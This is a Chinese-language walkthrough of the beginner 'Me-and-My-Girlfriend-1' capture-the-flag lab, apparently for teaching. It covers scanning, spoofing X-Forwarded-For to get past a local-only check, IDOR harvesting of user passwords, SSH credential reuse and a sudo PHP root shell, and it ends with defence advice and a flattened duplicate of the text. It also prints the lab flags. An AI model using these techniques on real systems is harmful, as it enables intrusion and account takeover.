入门靶机训练1-Me-and-My-Girlfriend-1
字数 1060 2025-08-20 18:17:41

Me-and-My-Girlfriend-1 靶机渗透训练教学文档

靶机概述

  • 名称:Me-and-My-Girlfriend-1
  • 难度:入门级
  • 主要技术点:信息收集、HTTP头绕过、水平越权、SSH撞库、PHP提权

一、信息收集阶段

1. 主机探测

  • 使用工具:nmap/arp-scan
  • 发现存活IP:192.168.116.128

2. 端口扫描

nmap -sV 192.168.116.128
  • 开放端口:
    • 22/tcp - SSH服务
    • 80/tcp - HTTP服务

3. 目录扫描

  • 使用工具:dirb/gobuster/dirsearch
  • 命令示例:
gobuster dir -u http://192.168.116.128 -w /path/to/wordlist.txt

二、Web渗透阶段

1. 初步访问

  • 直接访问80端口网站,前台无明显功能点

2. HTTP头绕过

  • 发现网站限制只能从本地访问
  • 绕过方法:添加X-Forwarded-For头
X-Forwarded-For: 127.0.0.1
  • 实现方式:
    • 使用Burp Suite修改请求头
    • 使用浏览器插件:
      • Firefox: Header Editor
      • Chrome/IE: ModHeader

3. 功能分析

  • 发现登录/注册功能
  • SQL注入测试无果

4. 水平越权漏洞

  • 登录后URL特征:id=
  • 手动测试ID参数:
    • id=1 → eweuhtandingan/skuyatuh
    • id=2 → aingmaung/qwerty!!!
    • id=3 → sundatea/indONEsia
    • id=4 → sedihaingmah/cedihhihihi
    • id=5 → alice/4lic3
    • id=9 → abdikasepak/dorrrrr

三、系统权限获取

1. SSH撞库攻击

  • 使用获取的凭据尝试SSH登录:
    • alice/4lic3 → 登录成功

2. 获取Flag1

  • 登录后查看当前目录:
ls
  • 发现Flag1:
gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

四、权限提升阶段

1. 检查sudo权限

sudo -l
  • 发现:
User alice may run the following commands on target:
    (root) NOPASSWD: /usr/bin/php

2. PHP提权

  • 测试PHP执行:
php -r "phpinfo();"
  • 提权命令:
sudo php -r "system('/bin/bash');"
  • 成功获取root shell

3. 获取Flag2

  • 进入root目录:
cd /root
ls
  • 发现Flag2:
gfriEND{56fbeef560930e77ff984b644fde66e7}

关键知识点总结

  1. HTTP头绕过:X-Forwarded-For常用于绕过IP限制
  2. 水平越权:通过修改ID参数访问其他用户数据
  3. 凭据重用:Web应用凭据可能在SSH等服务中重用
  4. sudo提权:检查用户可无密码执行的命令
  5. PHP提权:通过PHP的system函数执行shell

防御建议

  1. 实施严格的访问控制,不只是依赖HTTP头
  2. 使用随机UUID而非自增ID作为用户标识
  3. 实施密码策略,避免密码重用
  4. 限制sudo权限,避免给普通用户过高权限
  5. 对系统进行定期安全审计
Me-and-My-Girlfriend-1 靶机渗透训练教学文档 靶机概述 名称:Me-and-My-Girlfriend-1 难度:入门级 主要技术点:信息收集、HTTP头绕过、水平越权、SSH撞库、PHP提权 一、信息收集阶段 1. 主机探测 使用工具:nmap/arp-scan 发现存活IP:192.168.116.128 2. 端口扫描 开放端口: 22/tcp - SSH服务 80/tcp - HTTP服务 3. 目录扫描 使用工具:dirb/gobuster/dirsearch 命令示例: 二、Web渗透阶段 1. 初步访问 直接访问80端口网站,前台无明显功能点 2. HTTP头绕过 发现网站限制只能从本地访问 绕过方法:添加X-Forwarded-For头 实现方式: 使用Burp Suite修改请求头 使用浏览器插件: Firefox: Header Editor Chrome/IE: ModHeader 3. 功能分析 发现登录/注册功能 SQL注入测试无果 4. 水平越权漏洞 登录后URL特征: id= 手动测试ID参数: id=1 → eweuhtandingan/skuyatuh id=2 → aingmaung/qwerty!! ! id=3 → sundatea/indONEsia id=4 → sedihaingmah/cedihhihihi id=5 → alice/4lic3 id=9 → abdikasepak/dorrrrr 三、系统权限获取 1. SSH撞库攻击 使用获取的凭据尝试SSH登录: alice/4lic3 → 登录成功 2. 获取Flag1 登录后查看当前目录: 发现Flag1: 四、权限提升阶段 1. 检查sudo权限 发现: 2. PHP提权 测试PHP执行: 提权命令: 成功获取root shell 3. 获取Flag2 进入root目录: 发现Flag2: 关键知识点总结 HTTP头绕过 :X-Forwarded-For常用于绕过IP限制 水平越权 :通过修改ID参数访问其他用户数据 凭据重用 :Web应用凭据可能在SSH等服务中重用 sudo提权 :检查用户可无密码执行的命令 PHP提权 :通过PHP的system函数执行shell 防御建议 实施严格的访问控制,不只是依赖HTTP头 使用随机UUID而非自增ID作为用户标识 实施密码策略,避免密码重用 限制sudo权限,避免给普通用户过高权限 对系统进行定期安全审计